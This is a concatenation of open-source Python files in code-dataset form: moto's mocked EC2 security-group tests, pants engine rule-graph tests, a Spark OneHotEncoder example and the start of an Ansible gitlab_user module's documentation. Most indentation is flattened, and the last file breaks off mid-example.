conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = "vpc-12345"
# create 2 groups in a vpc
security_group = conn.create_security_group('test1', 'test1', vpc_id)
other_security_group = conn.create_security_group('test2', 'test2', vpc_id)
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
success.should.be.true
# Check that the rule is accurate
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test1'][0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].group_id.should.equal(other_security_group.id)
# Now remove the rule
success = security_group.revoke(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
success.should.be.true
# And check that it gets revoked
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test1'][0]
security_group.rules.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_all_security_groups():
conn = boto.connect_ec2()
sg1 = conn.create_security_group(
name='test1', description='test1', vpc_id='vpc-mjm05d27')
conn.create_security_group(name='test2', description='test2')
resp = conn.get_all_security_groups(groupnames=['test1'])
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'vpc-id': ['vpc-mjm05d27']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'vpc_id': ['vpc-mjm05d27']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'description': ['test1']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups()
resp.should.have.length_of(4)
@mock_ec2_deprecated
def test_authorize_bad_cidr_throws_invalid_parameter_value():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
with assert_raises(EC2ResponseError) as cm:
security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123")
cm.exception.code.should.equal('InvalidParameterValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_security_group_tagging():
conn = boto.connect_vpc()
vpc = conn.create_vpc("10.0.0.0/16")
sg = conn.create_security_group("test-sg", "Test SG", vpc.id)
with assert_raises(EC2ResponseError) as ex:
sg.add_tag("Test", "Tag", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
sg.add_tag("Test", "Tag")
tag = conn.get_all_tags()[0]
tag.name.should.equal("Test")
tag.value.should.equal("Tag")
group = conn.get_all_security_groups("test-sg")[0]
group.tags.should.have.length_of(1)
group.tags["Test"].should.equal("Tag")
@mock_ec2_deprecated
def test_security_group_tag_filtering():
conn = boto.connect_ec2()
sg = conn.create_security_group("test-sg", "Test SG")
sg.add_tag("test-tag", "test-value")
groups = conn.get_all_security_groups(
filters={"tag:test-tag": "test-value"})
groups.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_all_protocols_with_no_port_specification():
conn = boto.connect_ec2()
sg = conn.create_security_group('test', 'test')
success = sg.authorize(ip_protocol='-1', cidr_ip='0.0.0.0/0')
success.should.be.true
sg = conn.get_all_security_groups('test')[0]
sg.rules[0].from_port.should.equal(None)
sg.rules[0].to_port.should.equal(None)
@mock_ec2_deprecated
def test_sec_group_rule_limit():
ec2_conn = boto.connect_ec2()
sg = ec2_conn.create_security_group('test', 'test')
other_sg = ec2_conn.create_security_group('test_2', 'test_other')
# INGRESS
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(110)])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
sg.rules.should.be.empty
    # authorize a rule targeting a different sec group (because this counts too)
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
success.should.be.true
    # fill the rules up to the limit
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(99)])
success.should.be.true
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1', cidr_ip=['100.0.0.0/0'])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# EGRESS
    # authorize a rule targeting a different sec group (because this counts too)
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
    # fill the rules up to the limit
    # remember that, by default, a newly created sec group contains 1 egress rule
    # so our other_sg rule + 98 CIDR IP rules + 1 by default == 100, the limit
for i in range(98):
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='{0}.0.0.0/0'.format(i))
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='101.0.0.0/0')
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
@mock_ec2_deprecated
def test_sec_group_rule_limit_vpc():
ec2_conn = boto.connect_ec2()
vpc_conn = boto.connect_vpc()
vpc = vpc_conn.create_vpc('10.0.0.0/8')
sg = ec2_conn.create_security_group('test', 'test', vpc_id=vpc.id)
other_sg = ec2_conn.create_security_group('test_2', 'test', vpc_id=vpc.id)
# INGRESS
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(110)])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
sg.rules.should.be.empty
    # authorize a rule targeting a different sec group (because this counts too)
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
success.should.be.true
    # fill the rules up to the limit
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(49)])
# verify that we cannot authorize past the limit for a CIDR IP
success.should.be.true
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1', cidr_ip=['100.0.0.0/0'])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# EGRESS
    # authorize a rule targeting a different sec group (because this counts too)
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
    # fill the rules up to the limit
    # remember that, by default, a newly created sec group contains 1 egress rule
    # so our other_sg rule + 48 CIDR IP rules + 1 by default == 50, the limit
for i in range(48):
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='{0}.0.0.0/0'.format(i))
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='50.0.0.0/0')
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
'''
Boto3
'''
@mock_ec2
def test_add_same_rule_twice_throws_error():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg = ec2.create_security_group(
GroupName='sg1', Description='Test security group sg1', VpcId=vpc.id)
ip_permissions = [
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'IpRanges': [{"CidrIp": "1.2.3.4/32"}]
},
]
sg.authorize_ingress(IpPermissions=ip_permissions)
with assert_raises(ClientError) as ex:
sg.authorize_ingress(IpPermissions=ip_permissions)
@mock_ec2
def test_security_group_tagging_boto3():
conn = boto3.client('ec2', region_name='us-east-1')
sg = conn.create_security_group(GroupName="test-sg", Description="Test SG")
with assert_raises(ClientError) as ex:
conn.create_tags(Resources=[sg['GroupId']], Tags=[
{'Key': 'Test', 'Value': 'Tag'}], DryRun=True)
ex.exception.response['Error']['Code'].should.equal('DryRunOperation')
ex.exception.response['ResponseMetadata'][
'HTTPStatusCode'].should.equal(400)
ex.exception.response['Error']['Message'].should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
conn.create_tags(Resources=[sg['GroupId']], Tags=[
{'Key': 'Test', 'Value': 'Tag'}])
describe = conn.describe_security_groups(
Filters=[{'Name': 'tag-value', 'Values': ['Tag']}])
tag = describe["SecurityGroups"][0]['Tags'][0]
tag['Value'].should.equal("Tag")
tag['Key'].should.equal("Test")
@mock_ec2
def test_authorize_and_revoke_in_bulk():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg01 = ec2.create_security_group(
GroupName='sg01', Description='Test security group sg01', VpcId=vpc.id)
sg02 = ec2.create_security_group(
GroupName='sg02', Description='Test security group sg02', VpcId=vpc.id)
sg03 = ec2.create_security_group(
GroupName='sg03', Description='Test security group sg03')
ip_permissions = [
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'GroupName': 'sg02',
'UserId': sg02.owner_id}],
'IpRanges': []
},
{
'IpProtocol': 'tcp',
'FromPort': 27018,
'ToPort': 27018,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'UserId': sg02.owner_id}],
'IpRanges': []
},
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupName': 'sg03', 'UserId': sg03.owner_id}],
'IpRanges': []
}
]
expected_ip_permissions = copy.deepcopy(ip_permissions)
expected_ip_permissions[1]['UserIdGroupPairs'][0]['GroupName'] = 'sg02'
expected_ip_permissions[2]['UserIdGroupPairs'][0]['GroupId'] = sg03.id
sg01.authorize_ingress(IpPermissions=ip_permissions)
sg01.ip_permissions.should.have.length_of(3)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions.should.contain(ip_permission)
sg01.revoke_ingress(IpPermissions=ip_permissions)
sg01.ip_permissions.should.be.empty
for ip_permission in expected_ip_permissions:
sg01.ip_permissions.shouldnt.contain(ip_permission)
sg01.authorize_egress(IpPermissions=ip_permissions)
sg01.ip_permissions_egress.should.have.length_of(4)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions_egress.should.contain(ip_permission)
sg01.revoke_egress(IpPermissions=ip_permissions)
sg01.ip_permissions_egress.should.have.length_of(1)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions_egress.shouldnt.contain(ip_permission)
@mock_ec2_deprecated
def test_get_all_security_groups_filter_with_same_vpc_id():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
security_group = conn.create_security_group(
'test1', 'test1', vpc_id=vpc_id)
security_group2 = conn.create_security_group(
'test2', 'test2', vpc_id=vpc_id)
security_group.vpc_id.should.equal(vpc_id)
security_group2.vpc_id.should.equal(vpc_id)
security_groups = conn.get_all_security_groups(
group_ids=[security_group.id], filters={'vpc-id': [vpc_id]})
security_groups.should.have.length_of(1)
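# ---------------------------------------------------------------------------
# Editor's illustrative sketch (not one of the upstream moto tests): the same
# mock_ec2 pattern as the tests above, exercised through the plain boto3
# client API. It assumes only the imports already made at the top of this file.
@mock_ec2
def test_create_and_describe_security_group_boto3_sketch():
    client = boto3.client('ec2', region_name='us-east-1')
    client.create_security_group(GroupName='sketch-sg', Description='sketch')
    names = [group['GroupName']
             for group in client.describe_security_groups()['SecurityGroups']]
    names.should.contain('sketch-sg')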
|
foursquare/pants
|
refs/heads/master
|
tests/python/pants_test/engine/test_rules.py
|
1
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from builtins import object, str
from textwrap import dedent
from pants.engine.build_files import create_graph_rules
from pants.engine.fs import create_fs_rules
from pants.engine.mapper import AddressMapper
from pants.engine.rules import RootRule, RuleIndex, SingletonRule, TaskRule
from pants.engine.selectors import Get, Select
from pants.util.objects import Exactly
from pants_test.engine.examples.parsers import JsonParser
from pants_test.engine.examples.planners import Goal
from pants_test.engine.util import TargetTable, assert_equal_with_printing, create_scheduler
class AGoal(Goal):
@classmethod
def products(cls):
return [A]
class A(object):
def __repr__(self):
return 'A()'
class B(object):
def __repr__(self):
return 'B()'
class C(object):
def __repr__(self):
return 'C()'
class D(object):
def __repr__(self):
return 'D()'
def noop(*args):
pass
class SubA(A):
def __repr__(self):
return 'SubA()'
_suba_root_rules = [RootRule(SubA)]
class RuleIndexTest(unittest.TestCase):
def test_creation_fails_with_bad_declaration_type(self):
with self.assertRaises(TypeError) as cm:
RuleIndex.create([A()])
self.assertEquals("Unexpected rule type: <class 'pants_test.engine.test_rules.A'>."
" Rules either extend Rule, or are static functions decorated with @rule.",
str(cm.exception))
class RulesetValidatorTest(unittest.TestCase):
def test_ruleset_with_missing_product_type(self):
rules = _suba_root_rules + [TaskRule(A, [Select(B)], noop)]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, (Select(B),), noop):
no rule was available to compute B for subject type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_rule_with_two_missing_selects(self):
rules = _suba_root_rules + [TaskRule(A, [Select(B), Select(C)], noop)]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, (Select(B), Select(C)), noop):
no rule was available to compute B for subject type SubA
no rule was available to compute C for subject type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_selector_only_provided_as_root_subject(self):
rules = [RootRule(B), TaskRule(A, [Select(B)], noop)]
create_scheduler(rules)
def test_ruleset_with_superclass_of_selected_type_produced_fails(self):
rules = [
RootRule(C),
TaskRule(A, [Select(B)], noop),
TaskRule(B, [Select(SubA)], noop)
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(A, (Select(B),), noop):
no rule was available to compute B for subject type C
(B, (Select(SubA),), noop):
no rule was available to compute SubA for subject type C
""").strip(),
str(cm.exception))
def test_ruleset_with_explicit_type_constraint(self):
rules = _suba_root_rules + [
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(B, [Select(A)], noop)
]
create_scheduler(rules)
def test_ruleset_with_failure_due_to_incompatible_subject_for_singleton(self):
rules = [
RootRule(A),
TaskRule(D, [Select(C)], noop),
SingletonRule(B, B()),
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
# This error message could note near matches like the singleton.
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(D, (Select(C),), noop):
no rule was available to compute C for subject type A
""").strip(),
str(cm.exception))
def test_not_fulfillable_duplicated_dependency(self):
    # If a rule depends on another rule+subject in two ways, and one of them is
    # unfulfillable, only the unfulfillable one should be in the errors.
rules = _suba_root_rules + [
TaskRule(B, [Select(D)], noop),
TaskRule(D, [Select(A), Select(SubA)], noop, input_gets=[Get(A, C)]),
TaskRule(A, [Select(SubA)], noop)
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(B, (Select(D),), noop):
no rule was available to compute D for subject type SubA
(D, (Select(A), Select(SubA)), [Get(A, C)], noop):
no rule was available to compute A for subject type C
""").strip(),
str(cm.exception))
assert_equal_with_printing = assert_equal_with_printing
class RuleGraphMakerTest(unittest.TestCase):
# TODO something with variants
# TODO HasProducts?
def test_smallest_full_test(self):
rules = _suba_root_rules + [
RootRule(SubA),
TaskRule(Exactly(A), [Select(SubA)], noop)
]
fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(), fullgraph)
def test_full_graph_for_planner_example(self):
symbol_table = TargetTable()
address_mapper = AddressMapper(JsonParser(symbol_table), '*.BUILD.json')
rules = create_graph_rules(address_mapper, symbol_table) + create_fs_rules()
fullgraph_str = self.create_full_graph(rules)
print('---diagnostic------')
print(fullgraph_str)
print('/---diagnostic------')
in_root_rules = False
in_all_rules = False
all_rules = []
root_rule_lines = []
for line in fullgraph_str.splitlines():
if line.startswith(' // root subject types:'):
pass
elif line.startswith(' // root entries'):
in_root_rules = True
elif line.startswith(' // internal entries'):
in_all_rules = True
elif in_all_rules:
all_rules.append(line)
elif in_root_rules:
root_rule_lines.append(line)
else:
pass
self.assertTrue(6 < len(all_rules))
self.assertTrue(12 < len(root_rule_lines)) # 2 lines per entry
def test_smallest_full_test_multiple_root_subject_types(self):
rules = [
RootRule(SubA),
RootRule(A),
TaskRule(A, [Select(SubA)], noop),
TaskRule(B, [Select(A)], noop)
]
fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: A, SubA
// root entries
"Select(A) for A" [color=blue]
"Select(A) for A" -> {"SubjectIsProduct(A)"}
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"Select(B) for A" [color=blue]
"Select(B) for A" -> {"(B, (Select(A),), noop) of A"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of A" -> {"SubjectIsProduct(A)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
fullgraph)
def test_single_rule_depending_on_subject_selection(self):
rules = [
TaskRule(Exactly(A), [Select(SubA)], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(),
subgraph)
def test_multiple_selects(self):
rules = [
TaskRule(Exactly(A), [Select(SubA), Select(B)], noop),
TaskRule(B, [], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA), Select(B)), noop) of SubA"}
// internal entries
"(A, (Select(SubA), Select(B)), noop) of SubA" -> {"SubjectIsProduct(SubA)" "(B, (,), noop) of SubA"}
"(B, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_one_level_of_recursion(self):
rules = [
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(B, [Select(SubA)], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(B),), noop) of SubA"}
// internal entries
"(A, (Select(B),), noop) of SubA" -> {"(B, (Select(SubA),), noop) of SubA"}
"(B, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(),
subgraph)
def test_noop_removal_in_subgraph(self):
rules = [
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(A), [], noop),
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_noop_removal_full_single_subject_type(self):
rules = _suba_root_rules + [
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(A), [], noop),
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
fullgraph)
def test_root_tuple_removed_when_no_matches(self):
rules = [
RootRule(C),
RootRule(D),
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(B), [Select(D), Select(A)], noop),
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: C, D
// root entries
"Select(A) for C" [color=blue]
"Select(A) for C" -> {"(A, (Select(C),), noop) of C"}
// internal entries
"(A, (Select(C),), noop) of C" -> {"SubjectIsProduct(C)"}
}""").strip(),
fullgraph)
def test_noop_removal_transitive(self):
# If a noop-able rule has rules that depend on it,
# they should be removed from the graph.
rules = [
TaskRule(Exactly(B), [Select(C)], noop),
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(Exactly(A), [], noop),
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_get_with_matching_singleton(self):
rules = [
TaskRule(Exactly(A), [Select(SubA)], noop, input_gets=[Get(B, C)]),
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA())
#TODO perhaps singletons should be marked in the dot format somehow
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), [Get(B, C)], noop) of SubA"}
// internal entries
"(A, (Select(SubA),), [Get(B, C)], noop) of SubA" -> {"SubjectIsProduct(SubA)" "Singleton(B(), B)"}
}""").strip(),
subgraph)
def test_depends_on_multiple_one_noop(self):
rules = [
TaskRule(B, [Select(A)], noop),
TaskRule(A, [Select(C)], noop),
TaskRule(A, [Select(SubA)], noop)
]
subgraph = self.create_subgraph(B, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
subgraph)
def test_multiple_depend_on_same_rule(self):
rules = _suba_root_rules + [
TaskRule(B, [Select(A)], noop),
TaskRule(C, [Select(A)], noop),
TaskRule(A, [Select(SubA)], noop)
]
subgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
"Select(C) for SubA" [color=blue]
"Select(C) for SubA" -> {"(C, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"(C, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
subgraph)
def test_get_simple(self):
rules = [
TaskRule(Exactly(A), [], noop, [Get(B, D)]),
TaskRule(B, [Select(D)], noop),
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), [Get(B, D)], noop) of SubA"}
// internal entries
"(A, (,), [Get(B, D)], noop) of SubA" -> {"(B, (Select(D),), noop) of D"}
"(B, (Select(D),), noop) of D" -> {"SubjectIsProduct(D)"}
}""").strip(),
subgraph)
def create_full_graph(self, rules, validate=True):
scheduler = create_scheduler(rules, validate=validate)
return "\n".join(scheduler.rule_graph_visualization())
def create_subgraph(self, requested_product, rules, subject, validate=True):
scheduler = create_scheduler(rules + _suba_root_rules, validate=validate)
return "\n".join(scheduler.rule_subgraph_visualization(type(subject), requested_product))
assert_equal_with_printing = assert_equal_with_printing
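# Editor's illustrative sketch (not an upstream pants test): the same
# RootRule/TaskRule pattern used above, chaining A <- B <- SubA. Building the
# scheduler is itself the check, since it validates that every Select in the
# chain can be satisfied from the root subject.
class RuleChainSketch(unittest.TestCase):
  def test_two_step_chain(self):
    rules = [
      RootRule(SubA),
      TaskRule(B, [Select(SubA)], noop),
      TaskRule(A, [Select(B)], noop),
    ]
    # create_scheduler raises if any rule's selects cannot be fulfilled.
    create_scheduler(rules)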
|
byakuinss/spark
|
refs/heads/master
|
examples/src/main/python/ml/onehot_encoder_example.py
|
72
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
# $example on$
from pyspark.ml.feature import OneHotEncoder, StringIndexer
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("OneHotEncoderExample")\
.getOrCreate()
# $example on$
df = spark.createDataFrame([
(0, "a"),
(1, "b"),
(2, "c"),
(3, "a"),
(4, "a"),
(5, "c")
], ["id", "category"])
stringIndexer = StringIndexer(inputCol="category", outputCol="categoryIndex")
model = stringIndexer.fit(df)
indexed = model.transform(df)
encoder = OneHotEncoder(inputCol="categoryIndex", outputCol="categoryVec")
encoded = encoder.transform(indexed)
encoded.show()
# $example off$
spark.stop()
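    # Editor's note (illustrative, not part of the upstream example): with the
    # input above, StringIndexer assigns indices by descending label frequency,
    # so "a" -> 0.0, "c" -> 1.0, "b" -> 2.0; OneHotEncoder drops the last
    # category by default, so categoryVec holds 2-element sparse vectors,
    # e.g. (2,[0],[1.0]) for "a" and (2,[],[]) for "b".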
|
nitzmahone/ansible-modules-extras
|
refs/heads/devel
|
source_control/gitlab_user.py
|
23
|
#!/usr/bin/python
# (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gitlab_user
short_description: Creates/updates/deletes Gitlab Users
description:
    - When the user does not exist in Gitlab, it will be created.
    - When the user does exist and state=absent, the user will be deleted.
    - When changes are made to the user, the user will be updated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- pyapi-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- When using https if SSL certificate needs to be verified.
required: false
default: true
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
required: false
default: null
login_password:
description:
- Gitlab password for login_user
required: false
default: null
login_token:
description:
- Gitlab token for logging in.
required: false
default: null
name:
description:
- Name of the user you want to create
required: true
username:
description:
- The username of the user.
required: true
password:
description:
- The password of the user.
required: true
email:
description:
- The email that belongs to the user.
required: true
sshkey_name:
description:
- The name of the sshkey
required: false
default: null
sshkey_file:
description:
- The ssh key itself.
required: false
default: null
group:
description:
            - Add the user as a member of this group.
required: false
default: null
access_level:
description:
- The access level to the group. One of the following can be used.
- guest
- reporter
- developer
- master
- owner
required: false
default: null
state:
description:
            - Create or delete the user.
            - Possible values are present and absent.
required: false
default: present
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab User"
local_action: gitlab_user
server_url="http://gitlab.dj-wasabi.local"
validate_certs=false
